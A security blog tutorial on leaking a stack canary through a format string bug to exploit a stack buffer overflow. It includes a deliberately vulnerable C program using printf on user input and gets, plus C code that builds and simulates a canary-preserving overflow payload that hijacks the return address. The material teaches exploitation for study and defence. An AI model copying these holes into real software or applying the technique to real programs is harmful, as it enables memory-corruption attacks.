Format String Vulnerabilities Exploitation Case Study - Security Boulevard

Introduction:

In the previous article in this series, we discussed how format string vulnerabilities can be exploited on their own. This article is a case study of how a format string vulnerability can be chained with a more serious bug, a stack-based buffer overflow, to defeat a mitigation that would otherwise stop the overflow. We will begin by looking at what stack canaries are, and then exploit a buffer overflow by using the format string vulnerability to leak the canary.

What is a stack canary?

Stack canaries are used to detect a stack buffer overflow before the function returns through a corrupted return address. The compiler places a random value (the canary) on the stack between the local variables and the saved frame pointer and return address, and re-checks it in the function epilogue, just before the return address is used. To exploit a classic stack overflow, an attacker overwrites the return address; because the canary sits in between, a linear overwrite must also clobber the canary, the mismatch is detected, and the process is aborted (in glibc, via __stack_chk_fail) instead of returning. This makes exploitation considerably harder: the attacker must either avoid touching the canary or learn its value first, typically through an information leak such as a format string bug, and write it back unchanged while overwriting the return address.

How to bypass stack canary protection?

Now that we understand how stack canaries work, let us see how to bypass them and exploit the buffer overflow. We will use the same vulnerable program from the previous article for this exercise.

#include <stdio.h>

/* gets() is no longer declared by <stdio.h> under C11 and later, and
   vuln_func is defined after main, so both need prototypes to compile. */
char *gets(char *s);
void vuln_func(char *input);

int main(int argc, char *argv[]){
    if (argc < 2)
        return 1;
    vuln_func(argv[1]);
    return 0;
}

void vuln_func(char *input){
    char buffer[256];
    printf(input);      /* format string vulnerability: user input is the format */
    printf("\n");
    gets(buffer);       /* stack-based buffer overflow: no bound on the read */
}

The preceding program contains two distinct vulnerabilities:

  1. A format string vulnerability (printf(input) with attacker-controlled input)
  2. A stack-based buffer overflow (gets(buffer) with no length check)

We will use the format string vulnerability to leak the stack canary, and the stack-based buffer overflow to overwrite the saved return address and take control of the RIP register while writing the leaked canary back in place.
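The leak-then-overwrite plan above, and the canary check it has to get past, modelled in C as an added example. This is not code from the original article: it simulates the frame vuln_func() leaves on an x86-64 stack under -fstack-protector (the struct field order is a model of that layout, not real compiler output), the leaked canary value and the original return address are constructed, and the helper names (build_payload, parse_leaked_word, looks_like_canary, simulate_overflow) are this example's own. It shows why a blind overflow is aborted and why the same overflow succeeds once the leaked canary is written back in its slot.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256
#define WORD     8
#define PAYLOAD_LEN (BUF_SIZE + 3 * WORD)   /* buffer + canary + saved rbp + return address */

/* Simplified model of the frame vuln_func() builds on an x86-64 stack when
   compiled with -fstack-protector. Assumption: this field order is the model
   used here; the compiler decides the real layout. */
struct frame {
    char     buffer[BUF_SIZE];
    uint64_t canary;      /* random value stored at function entry */
    uint64_t saved_rbp;
    uint64_t ret_addr;    /* what 'ret' loads into RIP */
};

static void put_le64(uint8_t *dst, uint64_t v)
{
    for (int i = 0; i < WORD; i++)
        dst[i] = (uint8_t)(v >> (8 * i));   /* x86-64 is little-endian */
}

/* Overflow payload built after the canary has been leaked: filler for the
   buffer, the leaked canary written back into its own slot, a saved rbp,
   and the address RIP should take when vuln_func returns. */
size_t build_payload(uint8_t *out, uint64_t canary, uint64_t rbp, uint64_t target)
{
    memset(out, 'A', BUF_SIZE);
    put_le64(out + BUF_SIZE, canary);
    put_le64(out + BUF_SIZE + WORD, rbp);
    put_le64(out + BUF_SIZE + 2 * WORD, target);
    return PAYLOAD_LEN;
}

/* Parse one word printed by a %p conversion, e.g. "0x7b2c4d5e6f708900". */
int parse_leaked_word(const char *text, uint64_t *value)
{
    unsigned long long v;
    if (sscanf(text, "%llx", &v) != 1)
        return 0;
    *value = (uint64_t)v;
    return 1;
}

/* glibc canaries have a zero low byte so that string functions stop at them;
   that makes the canary easy to pick out of a run of leaked stack words. */
int looks_like_canary(uint64_t v)
{
    return v != 0 && (v & 0xffu) == 0;
}

/* Simulate gets() writing an over-long line across the frame, followed by the
   stack-protector check in the epilogue. Returns 1 and stores the hijacked
   return address if the canary matched (the exploit succeeds); returns 0 if
   the check would have failed and __stack_chk_fail aborted the process. */
int simulate_overflow(uint64_t real_canary, uint64_t canary_in_payload,
                      uint64_t target, uint64_t *rip_out)
{
    struct frame f;
    uint8_t payload[PAYLOAD_LEN];
    uint8_t *dst = (uint8_t *)&f;     /* gets() does not know where buffer ends */

    memset(&f, 0, sizeof f);
    f.canary   = real_canary;
    f.ret_addr = 0x401136;            /* constructed: original return address */

    size_t n = build_payload(payload, canary_in_payload, 0, target);
    for (size_t i = 0; i < n; i++)    /* unbounded copy, straight over the frame */
        dst[i] = payload[i];

    if (f.canary != real_canary)      /* epilogue check against the saved value */
        return 0;
    *rip_out = f.ret_addr;            /* canary intact: 'ret' would use our value */
    return 1;
}

int main(void)
{
    uint64_t canary = 0, rip = 0;
    /* Constructed leak output: pretend a "%N$p" conversion printed the canary slot. */
    parse_leaked_word("0x7b2c4d5e6f708900", &canary);
    printf("leaked word %#llx looks like a canary: %d\n",
           (unsigned long long)canary, looks_like_canary(canary));

    if (!simulate_overflow(canary, 0x4141414141414141ULL, 0xdeadbeefULL, &rip))
        printf("blind overflow: canary clobbered, process would abort\n");

    if (simulate_overflow(canary, canary, 0xdeadbeefULL, &rip))
        printf("leak-assisted overflow: RIP = %#llx\n", (unsigned long long)rip);
    return 0;
}
```

In a real run the leaked word comes from feeding vuln_func a format such as "%N$p" for increasing N and watching for a value with a zero low byte; the index and the number of words between the buffer and the canary depend on the binary and must be found from the actual stack, which is why the model above takes the canary value as an input rather than deriving it.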

This is a Security Bloggers Network syndicated blog from Infosec Resources authored by Srinivas. Read the original post at: http://feedproxy.google.com/~r/infosecResources/~3/rOH_9aQHaJk/